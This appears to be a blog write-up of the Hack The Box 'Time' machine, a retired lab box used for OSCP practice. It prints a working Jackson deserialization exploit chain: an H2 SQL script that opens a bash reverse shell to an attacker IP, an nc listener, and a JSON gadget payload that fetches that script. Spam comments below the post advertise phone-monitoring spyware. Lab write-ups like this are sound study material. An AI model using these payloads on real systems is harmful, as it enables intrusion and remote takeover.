OSCP PREPROTİONS – HTB Time

Time machine is a vulnerable machine with Linux operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of port scanning, 22/tcp ssh OpenSSH 8.2p1 and 80/tcp http Apache ports are open. Since there is no vulnerability in the ssh port, we provide enumeration over port 80.
We performed file and directory scans.
Gobuster scan

File and directory scanning did not yield any results.
We looked in developer options, source code and wepanalyzer and found nothing.

Looking at the input values, we understand that it organizes the json here as Beautify and Validate.
Let’s write a json and see how it parse.

Written json {“name”: “muhammed”, “surname”: “aygun”, “age”: “null”} output;

Let’s parse with validate

When parse
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object
We got the error.
Here we understand that the json we wrote is running on the server.
Let’s investigate this error. Is there any exploit?

When we investigated the error, we realized that it was an exploit due to the json error, this exploit https://blog.doyensec.com/2019/07/22/jackson-gadgets.html is very well explained. It accepts JSON content sent by an unknown client in the application. It contains SSRF and RCE vulnerabilities. Let’s search for the exploit of these vulnerabilities on Google.

We came across a github repo, and here’s what to do with it according to this repo;

  1. create the inject.sql file. It contains

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {“bash”, “-c”, cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter(“\A”);
return s.hasNext() ? s.next() : “”; }
$$;
CALL SHELLEXEC(‘bash -i >& /dev/tcp/10.10.14.4/4747 0>&1’)
The code is written.

  1. python3 -m http.server
    command is typed and the web server is offered to the target machine to access this file.
  2. Nc -lvnp 4747
    We listen to the port with the command.
  3. From the vulnerable application
    [“ch.qos.logback.core.db.DriverManagerConnectionSource”, {“url”: “jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM ‘http://10.10.14.4:8000/inject.sql'”}]
    The command is executed

After the command ran, we got our Shell.
This way we got our user flag

We could not access the root directory because we do not have root authorization after the user flag. We provide local enumeration to access root authorization.

/usr/bin/timer_backup.sh file. Let’s look at the contents of this file.

Here the timmer part draws our attention, let’s find time_backup.timer here and understand what it does

Here it calls timer_backup.service.
Let’s look at timer_backup.service

Here we saw it running /usr/bin/timer_backup.sh. Linpeas.sh also told us that it is among the interesting files 🙂
Let’s look at the content and ownership of this file.

Here we have seen the content of bash scrpit written in bash scrpit doing something related to backup, here the ownership of the file is owned by the pericles user that we have captured, then if we edit this file to give us revershell we can get root authorization.

We got root authorization

That’s how we got root authorization.

Comments

  1. ecommerce

    I loved as much as you will receive carried out right here.

    The sketch is attractive, your authored material
    stylish. nonetheless, you command get bought an nervousness over
    that you wish be delivering the following. unwell unquestionably come further formerly
    again since exactly the same nearly a lot often inside
    case you shield this hike. I saw similar here: Dobry sklep

  2. sklep internetowy

    Hello there! Do you know if they make any plugins to assist with Search Engine Optimization? I’m trying
    to get my blog to rank for some targeted keywords but I’m not seeing very good gains.
    If you know of any please share. Appreciate it! You can read similar text here:
    Sklep online

  3. Szpiegowskie Telefonu

    Oprogramowanie do monitorowania telefonów komórkowych CellSpy jest bardzo bezpiecznym i kompletnym narzędziem, najlepszym wyborem do efektywnego monitorowania telefonów komórkowych. Aplikacja może monitorować różne typy wiadomości, takie jak SMS, e-mail i aplikacje do czatu, takie jak Snapchat, Facebook, Viber i Skype. Możesz wyświetlić całą zawartość urządzenia docelowego: lokalizację GPS, zdjęcia, filmy i historię przeglądania, dane wejściowe z klawiatury itp.

  4. Susannah

    Howdy! Do you know if they make any plugins to assist with SEO?
    I’m trying to get my website to rank for some targeted keywords but I’m not seeing very good gains.
    If you know of any please share. Kudos! I saw similar text here: List of Backlinks

  5. sumatra tonic

    I needed to post you one little word to finally say thank you the moment again for your awesome principles you’ve provided on this page. This is quite generous of you to deliver unhampered what exactly most people might have offered for sale as an ebook to earn some profit for themselves, most notably given that you could have tried it if you ever considered necessary. The strategies additionally served to become good way to know that most people have a similar zeal much like my very own to realize whole lot more in respect of this matter. I’m sure there are many more enjoyable moments in the future for folks who looked at your blog post.

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir